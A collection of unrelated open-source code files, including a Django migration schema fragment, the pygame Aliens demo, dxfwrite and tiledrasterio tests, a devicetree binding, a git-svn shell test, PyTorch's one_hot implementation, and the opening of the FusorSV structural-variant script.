'course_key': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created': ('model_utils.fields.AutoCreatedField', [], {'default': 'datetime.datetime.now'}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('model_utils.fields.AutoLastModifiedField', [], {'default': 'datetime.datetime.now'})
},
'certificates.certificatehtmlviewconfiguration': {
'Meta': {'ordering': "('-change_date',)", 'object_name': 'CertificateHtmlViewConfiguration'},
'change_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'changed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'configuration': ('django.db.models.fields.TextField', [], {}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'certificates.certificatewhitelist': {
'Meta': {'object_name': 'CertificateWhitelist'},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'default': 'None', 'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'whitelist': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'certificates.examplecertificate': {
'Meta': {'object_name': 'ExampleCertificate'},
'access_key': ('django.db.models.fields.CharField', [], {'default': "'25c5af67da3d47039aa8b00b3a929fa9'", 'max_length': '255', 'db_index': 'True'}),
'created': ('model_utils.fields.AutoCreatedField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'download_url': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True'}),
'error_reason': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True'}),
'example_cert_set': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['certificates.ExampleCertificateSet']"}),
'full_name': ('django.db.models.fields.CharField', [], {'default': "u'John Do\\xeb'", 'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('model_utils.fields.AutoLastModifiedField', [], {'default': 'datetime.datetime.now'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'started'", 'max_length': '255'}),
'template': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'uuid': ('django.db.models.fields.CharField', [], {'default': "'88190407a2f14c429a7b5336e3fb0189'", 'unique': 'True', 'max_length': '255', 'db_index': 'True'})
},
'certificates.examplecertificateset': {
'Meta': {'object_name': 'ExampleCertificateSet'},
'course_key': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created': ('model_utils.fields.AutoCreatedField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('model_utils.fields.AutoLastModifiedField', [], {'default': 'datetime.datetime.now'})
},
'certificates.generatedcertificate': {
'Meta': {'unique_together': "(('user', 'course_id'),)", 'object_name': 'GeneratedCertificate'},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'default': 'None', 'max_length': '255', 'blank': 'True'}),
'created_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now_add': 'True', 'blank': 'True'}),
'distinction': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'download_url': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '128', 'blank': 'True'}),
'download_uuid': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '32', 'blank': 'True'}),
'error_reason': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '512', 'blank': 'True'}),
'grade': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '32', 'blank': 'True'}),
'mode': ('django.db.models.fields.CharField', [], {'default': "'honor'", 'max_length': '32'}),
'modified_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'unavailable'", 'max_length': '32'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'verify_uuid': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '32', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['certificates']
|
unknown
|
codeparrot/codeparrot-clean
| ||
#! /usr/bin/env python
import random, os.path
#import basic pygame modules
import pygame
from pygame.locals import *
#see if we can load more than standard BMP
if not pygame.image.get_extended():
raise SystemExit("Sorry, extended image module required")
#game constants
MAX_SHOTS = 2 #most player bullets onscreen
ALIEN_ODDS = 22 #chances a new alien appears
BOMB_ODDS = 60 #chances a new bomb will drop
ALIEN_RELOAD = 12 #frames between new aliens
SCREENRECT = Rect(0, 0, 640, 480)
SCORE = 0
def load_image(file):
"loads an image, prepares it for play"
file = os.path.join('data', file)
try:
surface = pygame.image.load(file)
except pygame.error:
raise SystemExit('Could not load image "%s" %s'%(file, pygame.get_error()))
return surface.convert()
def load_images(*files):
imgs = []
for file in files:
imgs.append(load_image(file))
return imgs
class dummysound:
def play(self): pass
def load_sound(file):
if not pygame.mixer: return dummysound()
file = os.path.join('data', file)
try:
sound = pygame.mixer.Sound(file)
return sound
except pygame.error:
print ('Warning, unable to load,', file)
return dummysound()
# each type of game object gets an init and an
# update function. the update function is called
# once per frame, and it is when each object should
# change it's current position and state. the Player
# object actually gets a "move" function instead of
# update, since it is passed extra information about
# the keyboard
class Player(pygame.sprite.Sprite):
speed = 10
bounce = 24
gun_offset = -11
images = []
def __init__(self):
pygame.sprite.Sprite.__init__(self, self.containers)
self.image = self.images[0]
self.rect = self.image.get_rect()
self.reloading = 0
self.rect.centerx = SCREENRECT.centerx
self.rect.bottom = SCREENRECT.bottom - 1
self.origtop = self.rect.top
self.facing = -1
def move(self, direction):
if direction: self.facing = direction
self.rect.move_ip(direction*self.speed, 0)
self.rect = self.rect.clamp(SCREENRECT)
if direction < 0:
self.image = self.images[0]
elif direction > 0:
self.image = self.images[1]
self.rect.top = self.origtop - (self.rect.left/self.bounce%2)
def gunpos(self):
pos = self.facing*self.gun_offset + self.rect.centerx
return pos, self.rect.top
class Alien(pygame.sprite.Sprite):
speed = 13
animcycle = 12
images = []
def __init__(self):
pygame.sprite.Sprite.__init__(self, self.containers)
self.image = self.images[0]
self.rect = self.image.get_rect()
self.facing = random.choice((-1,1)) * Alien.speed
self.frame = 0
if self.facing < 0:
self.rect.right = SCREENRECT.right
def update(self):
self.rect.move_ip(self.facing, 0)
if not SCREENRECT.contains(self.rect):
self.facing = -self.facing;
self.rect.top = self.rect.bottom + 1
self.rect = self.rect.clamp(SCREENRECT)
self.frame = self.frame + 1
self.image = self.images[self.frame/self.animcycle%3]
class Explosion(pygame.sprite.Sprite):
defaultlife = 12
animcycle = 3
images = []
def __init__(self, actor):
pygame.sprite.Sprite.__init__(self, self.containers)
self.image = self.images[0]
self.rect = self.image.get_rect()
self.life = self.defaultlife
self.rect.center = actor.rect.center
def update(self):
self.life = self.life - 1
self.image = self.images[self.life/self.animcycle%2]
if self.life <= 0: self.kill()
class Shot(pygame.sprite.Sprite):
speed = -11
images = []
def __init__(self, pos):
pygame.sprite.Sprite.__init__(self, self.containers)
self.image = self.images[0]
self.rect = self.image.get_rect()
self.rect.midbottom = pos
def update(self):
self.rect.move_ip(0, self.speed)
if self.rect.top <= 0:
self.kill()
class Bomb(pygame.sprite.Sprite):
speed = 9
images = []
def __init__(self, alien):
pygame.sprite.Sprite.__init__(self, self.containers)
self.image = self.images[0]
self.rect = self.image.get_rect()
self.rect.centerx = alien.rect.centerx
self.rect.bottom = alien.rect.bottom + 5
def update(self):
self.rect.move_ip(0, self.speed)
if self.rect.bottom >= 470:
Explosion(self)
self.kill()
class Score(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.font = pygame.font.Font(None, 20)
self.font.set_italic(1)
self.color = Color('white')
self.lastscore = -1
self.update()
self.rect = self.image.get_rect().move(10, 450)
def update(self):
if SCORE != self.lastscore:
self.lastscore = SCORE
msg = "Score: %d" % SCORE
self.image = self.font.render(msg, 0, self.color)
def main(winstyle = 0):
# Initialize pygame
pygame.init()
if pygame.mixer and not pygame.mixer.get_init():
print ('Warning, no sound')
pygame.mixer = None
# Set the display mode
winstyle = 0 # |FULLSCREEN
bestdepth = pygame.display.mode_ok(SCREENRECT.size, winstyle, 32)
screen = pygame.display.set_mode(SCREENRECT.size, winstyle, bestdepth)
#Load images, assign to sprite classes
#(do this before the classes are used, after screen setup)
img = load_image('player1.gif')
Player.images = [img, pygame.transform.flip(img, 1, 0)]
img = load_image('explosion1.gif')
Explosion.images = [img, pygame.transform.flip(img, 1, 1)]
Alien.images = load_images('alien1.gif', 'alien2.gif', 'alien3.gif')
Bomb.images = [load_image('bomb.gif')]
Shot.images = [load_image('shot.gif')]
#decorate the game window
icon = pygame.transform.scale(Alien.images[0], (32, 32))
pygame.display.set_icon(icon)
pygame.display.set_caption('Pygame Aliens')
pygame.mouse.set_visible(0)
#create the background, tile the bgd image
bgdtile = load_image('background.gif')
background = pygame.Surface(SCREENRECT.size)
for x in range(0, SCREENRECT.width, bgdtile.get_width()):
background.blit(bgdtile, (x, 0))
screen.blit(background, (0,0))
pygame.display.flip()
#load the sound effects
boom_sound = load_sound('boom.wav')
shoot_sound = load_sound('car_door.wav')
if pygame.mixer and pygame.mixer.music:
music = os.path.join('data', 'house_lo.wav')
pygame.mixer.music.load(music)
pygame.mixer.music.play(-1)
# Initialize Game Groups
aliens = pygame.sprite.Group()
shots = pygame.sprite.Group()
bombs = pygame.sprite.Group()
all = pygame.sprite.RenderUpdates()
lastalien = pygame.sprite.GroupSingle()
#assign default groups to each sprite class
Player.containers = all
Alien.containers = aliens, all, lastalien
Shot.containers = shots, all
Bomb.containers = bombs, all
Explosion.containers = all
Score.containers = all
#Create Some Starting Values
global score
alienreload = ALIEN_RELOAD
kills = 0
clock = pygame.time.Clock()
#initialize our starting sprites
global SCORE
player = Player()
Alien() #note, this 'lives' because it goes into a sprite group
if pygame.font:
all.add(Score())
while player.alive():
#get input
for event in pygame.event.get():
if event.type == QUIT or \
(event.type == KEYDOWN and event.key == K_ESCAPE):
return
keystate = pygame.key.get_pressed()
# clear/erase the last drawn sprites
all.clear(screen, background)
#update all the sprites
all.update()
#handle player input
direction = keystate[K_RIGHT] - keystate[K_LEFT]
player.move(direction)
firing = keystate[K_SPACE]
if not player.reloading and firing and len(shots) < MAX_SHOTS:
Shot(player.gunpos())
shoot_sound.play()
player.reloading = firing
# Create new alien
if alienreload:
alienreload = alienreload - 1
elif not int(random.random() * ALIEN_ODDS):
Alien()
alienreload = ALIEN_RELOAD
# Drop bombs
if lastalien and not int(random.random() * BOMB_ODDS):
Bomb(lastalien.sprite)
# Detect collisions
for alien in pygame.sprite.spritecollide(player, aliens, 1):
boom_sound.play()
Explosion(alien)
Explosion(player)
SCORE = SCORE + 1
player.kill()
for alien in pygame.sprite.groupcollide(shots, aliens, 1, 1).keys():
boom_sound.play()
Explosion(alien)
SCORE = SCORE + 1
for bomb in pygame.sprite.spritecollide(player, bombs, 1):
boom_sound.play()
Explosion(player)
Explosion(bomb)
player.kill()
#draw the scene
dirty = all.draw(screen)
pygame.display.update(dirty)
#cap the framerate
clock.tick(40)
if pygame.mixer and pygame.mixer.music:
pygame.mixer.music.fadeout(1000)
pygame.time.wait(1000)
#call the "main" function if running this script
if __name__ == '__main__': main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env python
#coding:utf-8
# Created: 27.03.2010
# Copyright (C) 2010, Manfred Moitzi
# License: MIT License
__author__ = "mozman <mozman@gmx.at>"
try:
# Python 2.6 and earlier need the unittest2 package
# try: easy_install unittest2
# or download source from: http://pypi.python.org/pypi/unittest2
import unittest2 as unittest
except ImportError:
import unittest
from dxfwrite.helpers import normalize_dxf_chunk
from dxfwrite.base import dxfstr, DXFInt
from dxfwrite.const import POLYLINE_CLOSED
from dxfwrite.curves import Ellipse
expected = " 0\nPOLYLINE\n 6\nSOLID\n 62\n3\n 8\n0\n 66\n1\n 10\n0.0\n 20\n" \
"0.0\n 30\n0.0\n 70\n8\n 0\nVERTEX\n 8\n0\n 10\n4.33012701892\n 20\n2.5\n 30\n" \
"0.0\n 0\nVERTEX\n 8\n0\n 10\n4.16225056329\n 20\n2.74261781728\n 30\n0.0\n 0\n" \
"VERTEX\n 8\n0\n 10\n3.95428935941\n 20\n2.9588227257\n 30\n0.0\n 0\nVERTEX\n" \
" 8\n0\n 10\n3.70824618737\n 20\n3.14653255383\n 30\n0.0\n 0\nVERTEX\n 8\n0\n" \
" 10\n3.42649057741\n 20\n3.30393955338\n 30\n0.0\n 0\nVERTEX\n 8\n0\n 10\n" \
"3.11173599008\n 20\n3.42952780893\n 30\n0.0\n 0\nVERTEX\n 8\n0\n 10\n" \
"2.76701368411\n 20\n3.5220878369\n 30\n0.0\n 0\nVERTEX\n 8\n0\n 10\n" \
"2.39564352377\n 20\n3.58072823363\n 30\n0.0\n 0\nVERTEX\n 8\n0\n 10\n" \
"2.0012020067\n 20\n3.60488426005\n 30\n0.0\n 0\nVERTEX\n 8\n0\n 10\n" \
"1.58748782034\n 20\n3.59432328042\n 30\n0.0\n 0\nVERTEX\n 8\n0\n 10\n" \
"1.15848525845\n 20\n3.54914700274\n 30\n0.0\n 0\nVERTEX\n 8\n0\n 10\n" \
"0.718325850239\n 20\n3.46979049926\n 30\n0.0\n 0\nVERTEX\n 8\n0\n 10\n" \
"0.271248571411\n 20\n3.35701801649\n 30\n0.0\n 0\nVERTEX\n 8\n0\n 10\n" \
"-0.17844097944\n 20\n3.21191561509\n 30\n0.0\n 0\nVERTEX\n 8\n0\n 10\n" \
"-0.626412046113\n 20\n3.0358807105\n 30\n0.0\n 0\nVERTEX\n 8\n0\n 10\n" \
"-1.06835042235\n 20\n2.83060861509\n 30\n0.0\n 0\nSEQEND\n"
class TestEllipse(unittest.TestCase):
def test_api(self):
ellipse = Ellipse(center=(0., 0.), rx=5.0, ry=3.0,
startangle=0., endangle=360., rotation=30.,
segments=100, color=3, layer='0', linetype='SOLID')
self.assertNotEqual(ellipse, None)
def test_implementation(self):
ellipse = Ellipse(center=(0., 0.), rx=5.0, ry=3.0,
startangle=0., endangle=90., rotation=30.,
segments=16, color=3, layer='0', linetype='SOLID')
result = dxfstr(ellipse)
self.assertSequenceEqual(normalize_dxf_chunk(result), normalize_dxf_chunk(expected))
def test_closed_ellipse(self):
ellipse = Ellipse(center=(0., 0.), rx=5.0, ry=3.0,
startangle=0., endangle=360., rotation=30.,
segments=16, color=3, layer='0', linetype='SOLID')
flags = 0
for tag in ( t for t in ellipse.__dxftags__() if isinstance(t, DXFInt) ):
if tag.group_code == 70:
flags = tag.value
break
self.assertTrue(flags & POLYLINE_CLOSED)
if __name__=='__main__':
unittest.main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
from tiledrasterio._virtualraster import Band, VirtualRaster, Source
import numpy as np
def create_virtual_raster():
src_path = "tests/data/dummy.asc"
source_band = 1
source_window = ( (1,4),(1,4) )
destination_window = ( (3,6),(3,6) )
band = Band(1,'int64')
for r, c in np.ndindex((3,3)):
src_win = ((0,3),(0,3))
dst_win = ((r*3,r*3+3),(c*3,c*3+3))
band.sources.append(Source(src_path, source_band, src_win, dst_win, source_nodata = None))
dataset = VirtualRaster((9,9))
dataset.bands.append(band)
return dataset
def test_read_full():
expected = np.array(
[[-9999, -9999, 5, -9999, -9999, 5, -9999, -9999, 5],
[-9999, 20, 100, -9999, 20, 100, -9999, 20, 100],
[ 3, 8, 35, 3, 8, 35, 3, 8, 35],
[-9999, -9999, 5, -9999, -9999, 5, -9999, -9999, 5],
[-9999, 20, 100, -9999, 20, 100, -9999, 20, 100],
[ 3, 8, 35, 3, 8, 35, 3, 8, 35],
[-9999, -9999, 5, -9999, -9999, 5, -9999, -9999, 5],
[-9999, 20, 100, -9999, 20, 100, -9999, 20, 100],
[ 3, 8, 35, 3, 8, 35, 3, 8, 35]])
ds = create_virtual_raster()
ds.open()
actual = ds.read_band(1)
ds.close()
assert np.all(expected == actual)
def test_read_masked():
expected = np.array(
[[ True, True, False, True, True, False, True, True, False],
[ True, False, False, True, False, False, True, False, False],
[False, False, False, False, False, False, False, False, False],
[ True, True, False, True, True, False, True, True, False],
[ True, False, False, True, False, False, True, False, False],
[False, False, False, False, False, False, False, False, False],
[ True, True, False, True, True, False, True, True, False],
[ True, False, False, True, False, False, True, False, False],
[False, False, False, False, False, False, False, False, False]], dtype='bool')
ds = create_virtual_raster()
ds.open()
actual = ds.read_band(1, masked=True)
ds.close()
assert np.all(actual.mask == expected)
def test_read_full_scaled():
expected = np.array(
[[-9999, 5, -9999, 5, -9999, 5],
[ 3, 35, 3, 35, 3, 35],
[-9999, 5, -9999, 5, -9999, 5],
[ 3, 35, 3, 35, 3, 35],
[-9999, 5, -9999, 5, -9999, 5],
[ 3, 35, 3, 35, 3, 35]], dtype='int32')
ds = create_virtual_raster()
ds.open()
out = np.zeros((6,6), dtype='int32')
actual = ds.read_band(1, out=out)
ds.close()
assert np.all(expected == actual)
|
unknown
|
codeparrot/codeparrot-clean
| ||
# SPDX-License-Identifier: (GPL-2.0-only OR BSD-2-Clause)
%YAML 1.2
---
$id: http://devicetree.org/schemas/gpio/st,spear-spics-gpio.yaml#
$schema: http://devicetree.org/meta-schemas/core.yaml#
title: ST Microelectronics SPEAr SPI CS GPIO Controller
maintainers:
- Viresh Kumar <vireshk@kernel.org>
description: >
SPEAr platform provides a provision to control chipselects of ARM PL022 Prime
Cell spi controller through its system registers, which otherwise remains
under PL022 control. If chipselect remain under PL022 control then they would
be released as soon as transfer is over and TxFIFO becomes empty. This is not
desired by some of the device protocols above spi which expect (multiple)
transfers without releasing their chipselects.
Chipselects can be controlled by software by turning them as GPIOs. SPEAr
provides another interface through system registers through which software can
directly control each PL022 chipselect. Hence, it is natural for SPEAr to
export the control of this interface as gpio.
properties:
compatible:
const: st,spear-spics-gpio
reg:
maxItems: 1
gpio-controller: true
'#gpio-cells':
const: 2
st-spics,peripcfg-reg:
description: Offset of the peripcfg register.
$ref: /schemas/types.yaml#/definitions/uint32
st-spics,sw-enable-bit:
description: Bit offset to enable software chipselect control.
$ref: /schemas/types.yaml#/definitions/uint32
st-spics,cs-value-bit:
description: Bit offset to drive chipselect low or high.
$ref: /schemas/types.yaml#/definitions/uint32
st-spics,cs-enable-mask:
description: Bitmask selecting which chipselects to enable.
$ref: /schemas/types.yaml#/definitions/uint32
st-spics,cs-enable-shift:
description: Bit shift for programming chipselect number.
$ref: /schemas/types.yaml#/definitions/uint32
required:
- compatible
- reg
- gpio-controller
- '#gpio-cells'
- st-spics,peripcfg-reg
- st-spics,sw-enable-bit
- st-spics,cs-value-bit
- st-spics,cs-enable-mask
- st-spics,cs-enable-shift
additionalProperties: false
examples:
- |
gpio@e0700000 {
compatible = "st,spear-spics-gpio";
reg = <0xe0700000 0x1000>;
st-spics,peripcfg-reg = <0x3b0>;
st-spics,sw-enable-bit = <12>;
st-spics,cs-value-bit = <11>;
st-spics,cs-enable-mask = <3>;
st-spics,cs-enable-shift = <8>;
gpio-controller;
#gpio-cells = <2>;
};
|
unknown
|
github
|
https://github.com/torvalds/linux
|
Documentation/devicetree/bindings/gpio/st,spear-spics-gpio.yaml
|
#!/bin/sh
#
# Copyright (c) 2008 Brad King
test_description='git svn dcommit honors auto-props'
. ./lib-git-svn.sh
generate_auto_props() {
cat << EOF
[miscellany]
enable-auto-props=$1
[auto-props]
*.sh = svn:mime-type=application/x-shellscript; svn:eol-style=LF
*.txt = svn:mime-type=text/plain; svn:eol-style = native
EOF
}
test_expect_success 'initialize git svn' '
mkdir import &&
(
cd import &&
echo foo >foo &&
svn_cmd import -m "import for git svn" . "$svnrepo"
) &&
rm -rf import &&
git svn init "$svnrepo" &&
git svn fetch
'
test_expect_success 'enable auto-props config' '
mkdir user &&
generate_auto_props yes >user/config
'
test_expect_success 'add files matching auto-props' '
write_script exec1.sh </dev/null &&
echo "hello" >hello.txt &&
echo bar >bar &&
git add exec1.sh hello.txt bar &&
git commit -m "files for enabled auto-props" &&
git svn dcommit --config-dir=user
'
test_expect_success 'disable auto-props config' '
generate_auto_props no >user/config
'
test_expect_success 'add files matching disabled auto-props' '
write_script exec2.sh </dev/null &&
echo "world" >world.txt &&
echo zot >zot &&
git add exec2.sh world.txt zot &&
git commit -m "files for disabled auto-props" &&
git svn dcommit --config-dir=user
'
test_expect_success 'check resulting svn repository' '
(
mkdir work &&
cd work &&
svn_cmd co "$svnrepo" &&
cd svnrepo &&
# Check properties from first commit.
if test_have_prereq POSIXPERM
then
test "x$(svn_cmd propget svn:executable exec1.sh)" = "x*"
fi &&
test "x$(svn_cmd propget svn:mime-type exec1.sh)" = \
"xapplication/x-shellscript" &&
test "x$(svn_cmd propget svn:mime-type hello.txt)" = "xtext/plain" &&
test "x$(svn_cmd propget svn:eol-style hello.txt)" = "xnative" &&
test "x$(svn_cmd propget svn:mime-type bar)" = "x" &&
# Check properties from second commit.
if test_have_prereq POSIXPERM
then
test "x$(svn_cmd propget svn:executable exec2.sh)" = "x*"
fi &&
test "x$(svn_cmd propget svn:mime-type exec2.sh)" = "x" &&
test "x$(svn_cmd propget svn:mime-type world.txt)" = "x" &&
test "x$(svn_cmd propget svn:eol-style world.txt)" = "x" &&
test "x$(svn_cmd propget svn:mime-type zot)" = "x"
)
'
test_expect_success 'check renamed file' '
test -d user &&
generate_auto_props yes > user/config &&
git mv foo foo.sh &&
git commit -m "foo => foo.sh" &&
git svn dcommit --config-dir=user &&
(
cd work/svnrepo &&
svn_cmd up &&
test ! -e foo &&
test -e foo.sh &&
test "x$(svn_cmd propget svn:mime-type foo.sh)" = \
"xapplication/x-shellscript" &&
test "x$(svn_cmd propget svn:eol-style foo.sh)" = "xLF"
)
'
test_done
|
unknown
|
github
|
https://github.com/git/git
|
t/t9124-git-svn-dcommit-auto-props.sh
|
#define TORCH_ASSERT_ONLY_METHOD_OPERATORS
#include <ATen/core/Tensor.h>
#include <ATen/DTensorState.h>
#ifndef AT_PER_OPERATOR_HEADERS
#include <ATen/Functions.h>
#include <ATen/NativeFunctions.h>
#else
#include <ATen/ops/arange.h>
#include <ATen/ops/empty.h>
#include <ATen/ops/eq.h>
#include <ATen/ops/one_hot_native.h>
#include <ATen/ops/zeros.h>
#endif
namespace at::native {
Tensor one_hot(const Tensor &self, int64_t num_classes) {
TORCH_CHECK(self.dtype() == kLong, "one_hot is only applicable to index tensor of type LongTensor.");
// using meta bit test to catch Fake Tensor as well until __torch_function__
if (self.key_set().has_all(DispatchKeySet(BackendComponent::MetaBit)) ||
self.key_set().has_all(DispatchKeySet(DispatchKey::Python))) {
// functional version that torch.compiles better and works with dynamic shapes
if (num_classes == -1) {
num_classes = self.max().item().toLong() + 1;
}
{
// If `self` is a DTensor, then allow implicit replication
// of the `index` Tensor.
at::DTensorAllowImplicitReplication guard;
at::Tensor index = at::arange(num_classes, self.options());
return at::eq(self.unsqueeze(-1), index).to(kLong);
}
}
auto shape = self.sym_sizes().vec();
// empty tensor could be converted to one hot representation,
// but shape inference is not possible.
if (self.sym_numel() == 0) {
if (num_classes <= 0) {
TORCH_CHECK(false, "Can not infer total number of classes from empty tensor.");
} else {
shape.emplace_back(num_classes);
return at::empty_symint(shape, self.options());
}
}
// non-empty tensor
if (self.device().type() != at::kCUDA && self.device().type() != at::kMPS &&
self.device().type() != at::kPrivateUse1 && self.device().type() != at::kXLA) {
// for cuda, rely on device assert thrown by scatter
TORCH_CHECK(self.min().item().toLong() >= 0, "Class values must be non-negative.");
}
if (num_classes == -1) {
num_classes = self.max().item().toLong() + 1;
} else {
if (self.device().type() != at::kCUDA && self.device().type() != at::kMPS &&
self.device().type() != at::kPrivateUse1 && self.device().type() != at::kXLA) {
// rely on device asserts from scatter to avoid sync here
TORCH_CHECK(num_classes > self.max().item().toLong(), "Class values must be smaller than num_classes.");
} else {
//for cuda, assert that num_classes is at least 1
TORCH_CHECK(num_classes >= 1, "num_classes should be positive");
}
}
shape.emplace_back(num_classes);
Tensor ret = at::zeros_symint(shape, self.options());
ret.scatter_(-1, self.unsqueeze(-1), 1);
return ret;
}
} // namespace at::native
|
cpp
|
github
|
https://github.com/pytorch/pytorch
|
aten/src/ATen/native/Onehot.cpp
|
#!/usr/bin/env python
import argparse
import glob
import gc
import os
import time
import multiprocessing as mp
#pip installed libs
import numpy as np
#local libs
import fusorsv.svu_utils as su
import fusorsv.read_utils as ru
import fusorsv.fusor_utils as fusor
des = """
FusorSV - A Data Fusion Method for Multi Source (VCF4.0+) Structural Variation Analysis
Timothy James Becker, PhD candidate, UCONN 05/25/2016-06/19/2018\n version="""+fusor.fu.__version__
parser = argparse.ArgumentParser(description=des,formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('-r', '--ref_path',type=str, help='reference fasta needed to write vcf or g1k output files\t[None]')
des = """
input directory with sample named folders and caller id tagged vcf files
[EX] /path/sample/sample_S4.vcf implies that there are calls of id 4 for sample\t[None]"""
parser.add_argument('-i', '--in_dir',type=str, help=des)
parser.add_argument('-a', '--ctg_dir',type=str,help='assembly contig directory\t[None]')
parser.add_argument('-c', '--chroms',type=str,help='comma seperated chrom listing\t[1,2,...22,X,Y,MT]')
parser.add_argument('-o', '--out_dir',type=str, help='outputdirectory to save ...bam.bai/ into\t[None]')
parser.add_argument('-m', '--sv_mask',type=str,help='user supplied svmask file in BED3 or internal json format\t[None]')
parser.add_argument('-f', '--apply_fusion_model_path',type=str, help='apply a fusion model *.pickle.gz')
parser.add_argument('-p', '--cpus',type=int,help='number of cores to use in ||\t[1]')
parser.add_argument('--k_fold',type=int,help='k_fold cross validation, k=0 implies no validation\t[0]')
parser.add_argument('--n_k',type=int,help='number of times to do k_fold\t[1]')
parser.add_argument('--bins',type=int,help='number of requested discriminating features\t[14]')
parser.add_argument('--obs',type=int,help='number of observations needed per bin\t[1000]')
parser.add_argument('--min_g',type=float,help='minimum group expectation contribution\t[0.0]')
parser.add_argument('--over_m',type=float,help='overlap allowed before removal in merge step\t[0.0]')
parser.add_argument('--pre_cluster',action='store_true', help='cluster the calls for all samples first\t[False]')
parser.add_argument('--smoothing',action='store_true', help='brkpt_smoothing algo\t[False]')
parser.add_argument('--detail',action='store_true',help='provide a more detailed output\t[False]')
stage_mapping = """
1:1 mapping of caller ids to stage names (and back):
stage_map_json_file -> {0:'True',-1:'fusorSV',1:'MetaSV',4:'BreakDancer',9:'cnMOPS',10:'CNVnator',
11:'Delly',13:'GATK',14:'GenomeSTRiP',17:'Hydra',18:'Lumpy',35:'BreakSeq',
36:'Pindel',38:'Tigra'}\t[../data/stage_map.json]
"""
parser.add_argument('-S', '--stage_map_json_file',type=str,help=stage_mapping)
parser.add_argument('-E', '--stage_exclude_list',type=str,help='comma seperated id list to exclude from test/training\t[1,13,36]')
parser.add_argument('-F', '--sample_folder_exclude',type=str,help='comma seperated folder names to exclude\t[None]')
parser.add_argument('-M', '--cluster_overlap',type=float,help='reciprocal overlap needed for clustering\t[0.5]')
parser.add_argument('-L', '--lift_over',type=str,help='liftover chain file path or default\t[./data/hg19ToHg38.over.chain.gz]')
parser.add_argument('-C', '--clean', action='store_true',help='keep all kfold run data and print extra details\t[False]')
parser.add_argument('-T', '--test_libs', action='store_true', help='test the installation libraries and print version\t[False]')
parser.add_argument('--no_merge',action='store_true',help='set to not merge output for large sample applications\t[False]')
parser.add_argument('--merge',action='store_true',help='perform a merge and exit for large sample applications\t[False]')
args = parser.parse_args()
if args.test_libs: #library tester should load all imports here
import fusion_utils as fu
x1,x2 = [[0,100,0,[],0,0,{}]],[[51,151,0,[],0,0,{}]]
F = fu.LR_no_idx(x1,x2)
T = [49,151,50,50]
if all([T[i]==(F[i][0][1]-F[i][0][0]) for i in range(len(T))]):
print('fusion_utils.so and bindings are functional!\nversion='+fu.__version__)
else:
print('error with library imports, check your installation')
quit(0)
if args.in_dir is not None:
in_dir = args.in_dir
if not os.path.exists(in_dir):
print('VCF input path does not exist!')
raise IOError
elif args.merge:
print('final FusorSV VCF merge starting')
else:
print('no VCF input')
raise IOError
if args.out_dir is not None:
out_dir = args.out_dir
else:
print('no output directory specified')
raise IOError
if args.apply_fusion_model_path is not None:
if args.apply_fusion_model_path.upper()=='DEFAULT':
apply_fusion_model_path =ru.get_local_path('models/human_g1k_v37_decoy.P3.pickle.gz')
else:
apply_fusion_model_path = args.apply_fusion_model_path
if not os.path.exists(apply_fusion_model_path):
print('fusion model path does not exist!')
raise IOError
else:
apply_fusion_model_path = None #implies you will make one with true input
if args.ctg_dir is not None:
ctg_dir = args.ctg_dir
else:
print('no contig directory specified')
ctg_dir = None
if args.ref_path is not None:
ref_path = args.ref_path
else:
ref_path = ''
print('ref_path not provided, will not be able to write a vcf and g1k file')
write_stats = True #new default
